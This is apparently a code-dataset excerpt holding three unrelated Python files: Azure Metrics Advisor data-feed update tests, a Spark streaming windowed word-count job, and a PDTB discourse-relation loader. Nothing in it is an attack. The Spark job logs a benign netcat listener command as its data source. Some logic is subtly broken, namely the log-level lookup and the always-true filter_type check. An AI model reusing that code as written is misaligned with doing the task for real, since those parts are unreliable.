skipped_feeds = self.admin_client.list_data_feeds(skip=1)
all_feeds_list = []
skipped_feeds_list = []
async for feed in all_feeds:
all_feeds_list.append(feed)
async for feed in skipped_feeds:
skipped_feeds_list.append(feed)
assert len(all_feeds_list) == len(skipped_feeds_list) + 1
@AzureTestCase.await_prepared_test
async def test_update_data_feed_with_model(self):
async with self.admin_client:
data_feed = await self._create_data_feed_for_update("update")
try:
data_feed.name = "update"
data_feed.data_feed_description = "updated"
data_feed.schema.timestamp_column = "time"
data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2020, 12, 10)
data_feed.ingestion_settings.ingestion_start_offset = 1
data_feed.ingestion_settings.data_source_request_concurrency = 1
data_feed.ingestion_settings.ingestion_retry_delay = 1
data_feed.ingestion_settings.stop_retry_after = 1
data_feed.rollup_settings.rollup_type = "AlreadyRollup"
data_feed.rollup_settings.rollup_method = "Sum"
data_feed.rollup_settings.rollup_identification_value = "sumrollup"
data_feed.rollup_settings.auto_rollup_group_by_column_names = []
data_feed.missing_data_point_fill_settings.fill_type = "CustomValue"
data_feed.missing_data_point_fill_settings.custom_fill_value = 2
data_feed.access_mode = "Public"
data_feed.viewer_emails = ["updated"]
data_feed.status = "Paused"
data_feed.action_link_template = "updated"
data_feed.source.connection_string = "updated"
data_feed.source.query = "get data"
await self.admin_client.update_data_feed(data_feed)
updated = await self.admin_client.get_data_feed(data_feed.id)
self.assertEqual(updated.name, "update")
self.assertEqual(updated.data_feed_description, "updated")
self.assertEqual(updated.schema.timestamp_column, "time")
self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
datetime.datetime(2020, 12, 10, tzinfo=tzutc()))
self.assertEqual(updated.ingestion_settings.ingestion_start_offset, 1)
self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 1)
self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, 1)
self.assertEqual(updated.ingestion_settings.stop_retry_after, 1)
self.assertEqual(updated.rollup_settings.rollup_type, "AlreadyRollup")
self.assertEqual(updated.rollup_settings.rollup_method, "Sum")
self.assertEqual(updated.rollup_settings.rollup_identification_value, "sumrollup")
self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "CustomValue")
self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 2)
self.assertEqual(updated.access_mode, "Public")
self.assertEqual(updated.viewer_emails, ["updated"])
self.assertEqual(updated.status, "Paused")
self.assertEqual(updated.action_link_template, "updated")
self.assertEqual(updated.source.query, "get data")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_update_data_feed_with_kwargs(self):
async with self.admin_client:
data_feed = await self._create_data_feed_for_update("update")
try:
await self.admin_client.update_data_feed(
data_feed.id,
name="update",
data_feed_description="updated",
timestamp_column="time",
ingestion_begin_time=datetime.datetime(2020, 12, 10),
ingestion_start_offset=1,
data_source_request_concurrency=1,
ingestion_retry_delay=1,
stop_retry_after=1,
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup",
auto_rollup_group_by_column_names=[],
fill_type="CustomValue",
custom_fill_value=2,
access_mode="Public",
viewer_emails=["updated"],
status="Paused",
action_link_template="updated",
source=SqlServerDataFeedSource(
connection_string="updated",
query="get data"
)
)
updated = await self.admin_client.get_data_feed(data_feed.id)
self.assertEqual(updated.name, "update")
self.assertEqual(updated.data_feed_description, "updated")
self.assertEqual(updated.schema.timestamp_column, "time")
self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
datetime.datetime(2020, 12, 10, tzinfo=tzutc()))
self.assertEqual(updated.ingestion_settings.ingestion_start_offset, 1)
self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 1)
self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, 1)
self.assertEqual(updated.ingestion_settings.stop_retry_after, 1)
self.assertEqual(updated.rollup_settings.rollup_type, "AlreadyRollup")
self.assertEqual(updated.rollup_settings.rollup_method, "Sum")
self.assertEqual(updated.rollup_settings.rollup_identification_value, "sumrollup")
self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "CustomValue")
self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 2)
self.assertEqual(updated.access_mode, "Public")
self.assertEqual(updated.viewer_emails, ["updated"])
self.assertEqual(updated.status, "Paused")
self.assertEqual(updated.action_link_template, "updated")
self.assertEqual(updated.source.query, "get data")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_update_data_feed_with_model_and_kwargs(self):
async with self.admin_client:
data_feed = await self._create_data_feed_for_update("update")
try:
data_feed.name = "updateMe"
data_feed.data_feed_description = "updateMe"
data_feed.schema.timestamp_column = "don't update me"
data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2020, 12, 22)
data_feed.ingestion_settings.ingestion_start_offset = 2
data_feed.ingestion_settings.data_source_request_concurrency = 2
data_feed.ingestion_settings.ingestion_retry_delay = 2
data_feed.ingestion_settings.stop_retry_after = 2
data_feed.rollup_settings.rollup_type = "don't update me"
data_feed.rollup_settings.rollup_method = "don't update me"
data_feed.rollup_settings.rollup_identification_value = "don't update me"
data_feed.rollup_settings.auto_rollup_group_by_column_names = []
data_feed.missing_data_point_fill_settings.fill_type = "don't update me"
data_feed.missing_data_point_fill_settings.custom_fill_value = 4
data_feed.access_mode = "don't update me"
data_feed.viewer_emails = ["don't update me"]
data_feed.status = "don't update me"
data_feed.action_link_template = "don't update me"
data_feed.source.connection_string = "don't update me"
data_feed.source.query = "don't update me"
await self.admin_client.update_data_feed(
data_feed,
timestamp_column="time",
ingestion_begin_time=datetime.datetime(2020, 12, 10),
ingestion_start_offset=1,
data_source_request_concurrency=1,
ingestion_retry_delay=1,
stop_retry_after=1,
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup",
auto_rollup_group_by_column_names=[],
fill_type="CustomValue",
custom_fill_value=2,
access_mode="Public",
viewer_emails=["updated"],
status="Paused",
action_link_template="updated",
source=SqlServerDataFeedSource(
connection_string="updated",
query="get data"
)
)
updated = await self.admin_client.get_data_feed(data_feed.id)
self.assertEqual(updated.name, "updateMe")
self.assertEqual(updated.data_feed_description, "updateMe")
self.assertEqual(updated.schema.timestamp_column, "time")
self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
datetime.datetime(2020, 12, 10, tzinfo=tzutc()))
self.assertEqual(updated.ingestion_settings.ingestion_start_offset, 1)
self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 1)
self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, 1)
self.assertEqual(updated.ingestion_settings.stop_retry_after, 1)
self.assertEqual(updated.rollup_settings.rollup_type, "AlreadyRollup")
self.assertEqual(updated.rollup_settings.rollup_method, "Sum")
self.assertEqual(updated.rollup_settings.rollup_identification_value, "sumrollup")
self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "CustomValue")
self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 2)
self.assertEqual(updated.access_mode, "Public")
self.assertEqual(updated.viewer_emails, ["updated"])
self.assertEqual(updated.status, "Paused")
self.assertEqual(updated.action_link_template, "updated")
self.assertEqual(updated.source.query, "get data")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@unittest.skip("skip test")
@AzureTestCase.await_prepared_test
async def test_update_data_feed_by_reseting_properties(self):
async with self.admin_client:
data_feed = await self._create_data_feed_for_update("update")
try:
await self.admin_client.update_data_feed(
data_feed.id,
name="update",
data_feed_description=None,
timestamp_column=None,
ingestion_start_offset=None,
data_source_request_concurrency=None,
ingestion_retry_delay=None,
stop_retry_after=None,
rollup_type=None,
rollup_method=None,
rollup_identification_value=None,
auto_rollup_group_by_column_names=None,
fill_type=None,
custom_fill_value=None,
access_mode=None,
viewer_emails=None,
status=None,
action_link_template=None,
)
updated = await self.admin_client.get_data_feed(data_feed.id)
self.assertEqual(updated.name, "update")
# self.assertEqual(updated.data_feed_description, "") # doesn't currently clear
# self.assertEqual(updated.schema.timestamp_column, "") # doesn't currently clear
self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
self.assertEqual(updated.ingestion_settings.ingestion_start_offset, -1)
self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 0)
self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, -1)
self.assertEqual(updated.ingestion_settings.stop_retry_after, -1)
self.assertEqual(updated.rollup_settings.rollup_type, "NoRollup")
self.assertEqual(updated.rollup_settings.rollup_method, "None")
self.assertEqual(updated.rollup_settings.rollup_identification_value, None)
self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "SmartFilling")
self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 0)
self.assertEqual(updated.access_mode, "Private")
# self.assertEqual(updated.viewer_emails, ["viewers"]) # doesn't currently clear
self.assertEqual(updated.status, "Active")
# self.assertEqual(updated.action_link_template, "updated") # doesn't currently clear
finally:
await self.admin_client.delete_data_feed(data_feed.id)
| StarcoderdataPython |
3428024 | <filename>spark2-streaming-python/app-package/src/main/resources/sparkStreaming/example/job.py<gh_stars>1-10
#
# Name: Job.py
# Purpose: Application entry point to create, configure and start spark streaming job.
# Author: PNDA team
#
# Created: 22/01/2018
#
#
#
# Copyright (c) 2018 Cisco and/or its affiliates.
#
# This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License").
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
# and/or its affiliated entities, under various laws including copyright, international treaties, patent,
# and/or contract. Any use of the material herein must be in accordance with the terms of the License.
# All rights not expressly granted by the License are reserved.
#
# Unless required by applicable law or agreed to separately in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied.
#
# Attribution:
# The calculation performed is taken from the Spark 2 example "structured streaming event time window example"
# https://github.com/apache/spark/blob/v2.2.1/examples/src/main/python/sql/streaming/structured_network_wordcount_windowed.py
#
from datetime import datetime
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
from pyspark.sql.functions import window
LOG_LEVEL_ERROR = 0
LOG_LEVEL_INFO = 1
LOG_LEVEL_DEBUG = 2
APP_LOG_LEVEL = LOG_LEVEL_INFO
def log_level_name(level):
if level == LOG_LEVEL_DEBUG:
return 'DEBUG'
elif level == LOG_LEVEL_INFO:
return 'INFO'
else:
return 'ERROR'
def log_level_value(level):
if level == 2:
return 'DEBUG'
elif level == 1:
return 'INFO'
else:
return 'ERROR'
def log_out(msg_level, message):
if APP_LOG_LEVEL >= msg_level:
print '%s %s %s' % (str(datetime.now()), log_level_name(msg_level), message)
def main():
global APP_LOG_LEVEL
log_out(LOG_LEVEL_INFO, 'Loading application.properties')
properties = dict(line.strip().split('=', 1) if not line.strip().startswith('#') else [line, None]
for line in open('application.properties'))
APP_LOG_LEVEL = log_level_value(['component.log_level'])
app_name = properties['component.application']
checkpoint_directory = properties['component.checkpoint_path']
input_host = properties['component.input_data_host']
input_port = properties['component.input_data_port']
window_interval = properties['component.query_window']
slide_interval = properties['component.query_slide']
log_out(LOG_LEVEL_INFO, 'Make sure that before running this application you have')
log_out(LOG_LEVEL_INFO, 'run the following command to create a source of data:')
log_out(LOG_LEVEL_INFO, '"nc -lk %s" on %s' % (input_port, input_host))
log_out(LOG_LEVEL_INFO, 'Creating spark context')
spark = SparkSession.builder.appName(app_name).getOrCreate()
lines = spark.readStream.format('socket') \
.option('host', input_host) \
.option('port', input_port) \
.option('includeTimestamp', 'true') \
.load()
words = lines.select(
explode(split(lines.value, ' ')).alias('word'),
lines.timestamp
)
windowed_counts = words.groupBy(window(words.timestamp, window_interval, slide_interval), words.word) \
.count() \
.orderBy('window')
query = windowed_counts.writeStream.outputMode('complete') \
.format('console') \
.option('truncate', 'false')
query.option('checkpointLocation', checkpoint_directory)
log_out(LOG_LEVEL_INFO, 'Starting spark streaming execution')
query.start().awaitTermination()
if __name__ == "__main__":
main()
| StarcoderdataPython |
200940 | from misc_utils import get_config, get_logger, tokenize
from discourse_relation import DiscourseRelation
from collections import Counter, defaultdict
import json
import abc
import numpy as np
from os.path import join
import os
logger = get_logger(__name__)
class Resource(metaclass=abc.ABCMeta):
def __init__(self, path, classes):
self.path = path
self.classes = sorted(classes)
self.y_indices = {x: y for y, x in enumerate(self.classes)}
self.instances = list(self._load_instances(path))
@abc.abstractmethod
def _load_instances(self, path):
raise NotImplementedError("This class must be subclassed.")
class PDTBRelations(Resource):
def __init__(self, path, classes, separate_dual_classes, filter_type=None, skip_missing_classes=True):
self.skip_missing_classes = skip_missing_classes
self.separate_dual_classes = separate_dual_classes
self.filter_type = [] if filter_type is None else filter_type
super().__init__(path, classes)
def _load_instances(self, path):
with open(join(path, 'relations.json')) as file_:
for line in file_:
rel = DiscourseRelation(json.loads(line.strip()))
if (self.filter_type != [] or self.filter_type is not None) and rel.relation_type() not in self.filter_type:
continue
if self.separate_dual_classes:
for splitted in rel.split_up_senses():
if len(splitted.senses()) > 1:
raise ValueError("n_senses > 1")
if len(splitted.senses()) == 1 and splitted.senses()[0] not in self.y_indices:
if self.skip_missing_classes:
logger.debug("Sense class {} not in class list, skipping {}".format(splitted.senses()[0], splitted.relation_id()))
continue
yield splitted
else:
a_class_exist = any(r in self.y_indices for r in rel.senses())
if not a_class_exist:
if self.skip_missing_classes:
logger.debug("Sense {} classes not in class list, skipping {}".format(rel.senses(), rel.relation_id()))
continue
yield rel
def get_feature_tensor(self, extractors):
rels_feats = []
n_instances = 0
last_features_for_instance = None
for rel in self.instances:
n_instances += 1
feats = []
total_features_per_instance = 0
for extractor in extractors:
# These return matrices of shape (1, n_features)
# We concatenate them on axis 1
arg_rawtext = getattr(rel, extractor.argument)()
arg_tokenized = tokenize(arg_rawtext)
arg_feats = extractor.extract_features(arg_tokenized)
feats.append(arg_feats)
total_features_per_instance += extractor.n_features
if last_features_for_instance is not None:
# Making sure we have equal number of features per instance
assert total_features_per_instance == last_features_for_instance
rels_feats.append(np.concatenate(feats, axis=1))
feature_tensor = np.array(rels_feats)
assert_shape = (n_instances, 1, total_features_per_instance)
assert feature_tensor.shape == assert_shape, \
"Tensor shape mismatch. Is {}, should be {}".format(feature_tensor.shape, assert_shape)
return feature_tensor
def get_correct(self, indices=True):
"""
Returns answer indices.
"""
for rel in self.instances:
senses = rel.senses()
if self.separate_dual_classes:
if indices:
yield self.y_indices[senses[0]]
else:
yield senses[0]
else:
ys = [self.y_indices[sense] for sense in senses]
if indices:
yield ys
else:
yield senses
def store_results(self, results, store_path):
"""
Don't forget to use the official scoring script here.
"""
text_results = [self.classes[res] for res in results]
# Load test file
# Output json object with results
# Deal with multiple instances somehow
predicted_rels = []
for text_result, rel in zip(text_results, self.instances):
if rel.is_explicit():
rel_type = 'Explicit'
else:
rel_type = 'Implicit'
predicted_rels.append(rel.to_output_format(text_result, rel_type)) # turn string representation into list instance first
# Store test file
if not os.path.exists(store_path):
os.makedirs(store_path)
with open(join(store_path, 'output.json'), 'w') as w:
for rel in predicted_rels:
w.write(json.dumps(rel) + '\n')
logger.info("Stored predicted output at {}".format(store_path))
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.